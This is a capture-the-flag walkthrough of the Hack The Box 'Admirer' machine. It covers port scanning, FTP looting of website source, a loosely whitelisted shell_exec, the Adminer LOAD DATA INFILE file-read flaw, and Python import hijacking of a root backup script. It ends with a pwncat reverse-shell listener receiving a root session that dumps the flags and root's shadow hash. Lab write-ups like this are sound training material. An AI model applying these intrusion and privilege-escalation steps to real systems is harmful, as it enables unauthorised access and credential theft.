# Nmap 7.80 scan initiated Fri Jun 12 13:18:53 2020 as: nmap -sSVC -p- -oA nmap_full 10.10.10.187 Nmap scan report for 10.10.10.187 Host is up (0.020s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Admirer Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jun 12 13:19:24 2020 -- 1 IP address (1 host up) scanned in 30.72 seconds
$ ftp 10.10.10.187 Connected to 10.10.10.187. 220 (vsFTPd 3.0.3) Name (10.10.10.187:noraj): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-x--- 2 0 111 4096 Dec 03 2019 . drwxr-x--- 2 0 111 4096 Dec 03 2019 .. -rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql -rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
dump.sql contains the table of images displayed on the home page, nothing
interesting except the db name admirerdb and knowing it's served on localhost.
Let's extract the website source:
1
$ mkdir website && tar xaf html.tar.gz -C website
There is a w4ld0s_s3cr3t_d1r fodler which is the same as admin-dir and
contains the same files except that there is one entry more in credentials.txt.
Available options: 1) View system uptime 2) View logged in users 3) View crontab (current user only) 4) Backup passwd file (not working) 5) Backup shadow file (not working) 6) Backup web data (not working) 7) Backup database (not working)
NOTE: Options 4-7 are currently NOT working because they need root privileges. I'm leaving them in the valid tasks in case I figure out a way to securely run code as root from a PHP page.
And that's the vulnerable code without the comments and HTML:
The task number is directly passed into a shell_exec() without any security
so we would have been able to do a system command injection if task was not
compared to a whitelist of allowed task number. It's a loose comparison so
there is maybe a way to bypass it.
Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a single file ready to deploy to the target server. Adminer is available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch and MongoDB.
Adminer versions up to (and including) 4.6.2 supported the use of the SQL statement LOAD DATA INFILE. It was possible to use this SQL statement to read arbitrary local files because of a protocol flaw in MySQL.
$ ssh waldo@10.10.10.187 waldo@10.10.10.187's password: Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have new mail. Last login: Sun Jul 12 16:20:44 2020 from 10.10.14.36 waldo@admirer:~$
backup_passwd() { if [ "$EUID" -eq 0 ] then echo"Backing up /etc/passwd to /var/backups/passwd.bak..." /bin/cp /etc/passwd /var/backups/passwd.bak /bin/chown root:root /var/backups/passwd.bak /bin/chmod 600 /var/backups/passwd.bak echo"Done." else echo"Insufficient privileges to perform the selected operation." fi }
backup_shadow() { if [ "$EUID" -eq 0 ] then echo"Backing up /etc/shadow to /var/backups/shadow.bak..." /bin/cp /etc/shadow /var/backups/shadow.bak /bin/chown root:shadow /var/backups/shadow.bak /bin/chmod 600 /var/backups/shadow.bak echo"Done." else echo"Insufficient privileges to perform the selected operation." fi }
backup_web() { if [ "$EUID" -eq 0 ] then echo"Running backup script in the background, it might take a while..." /opt/scripts/backup.py & else echo"Insufficient privileges to perform the selected operation." fi }
backup_db() { if [ "$EUID" -eq 0 ] then echo"Running mysqldump in the background, it may take a while..." #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql & /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql & else echo"Insufficient privileges to perform the selected operation." fi }
# Non-interactive way, to be used by the web interface if [ $# -eq 1 ] then option=$1 case$optionin 1) view_uptime ;; 2) view_users ;; 3) view_crontab ;; 4) backup_passwd ;; 5) backup_shadow ;; 6) backup_web ;; 7) backup_db ;;
*) echo"Unknown option." >&2 esac
exit 0 fi
# Interactive way, to be called from the command line options=("View system uptime" "View logged in users" "View crontab" "Backup passwd file" "Backup shadow file" "Backup web data" "Backup DB" "Quit")
backup_shadow and backup_passwd seem secure, backup_db won't help us so
let's dig in backup_web.
1 2 3 4 5 6 7 8 9 10
backup_web() { if [ "$EUID" -eq 0 ] then echo"Running backup script in the background, it might take a while..." /opt/scripts/backup.py & else echo"Insufficient privileges to perform the selected operation." fi }
It just launch /opt/scripts/backup.py, let's see that:
1 2 3 4 5 6 7 8 9 10 11 12
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore #dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
It looks like we'll have to mess with the python import system.
[[[ System Administration Menu ]]] 1) View system uptime 2) View logged in users 3) View crontab 4) Backup passwd file 5) Backup shadow file 6) Backup web data 7) Backup DB 8) Quit Choose an option: 6 Running backup script in the background, it might take a while...
On our listener:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ pwncat -l 8888 -vv INFO: Listening on :::8888 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP) INFO: Client connected from 10.10.10.187:33374 (family 2/IPv4, TCP) id uid=0(root) gid=0(root) groups=0(root) pwd /tmp/noraj cd /root cat root.txt 9e96b615438b09b210be126a5e7d0577 cat /home/waldo/user.txt 30a8ad9cb41261bf0f97f75094358045 cat /etc/shadow | grep root root:$6$M5g.E5/j$AO7lZNZXLFABZld5uGh/YB3J1Va4AG9Tmw1icvm2MsDOj6B1RFloUmnA9jcj4DIsILOedBvVQg66CVjGrd.fl0:18374:0:99999:7:::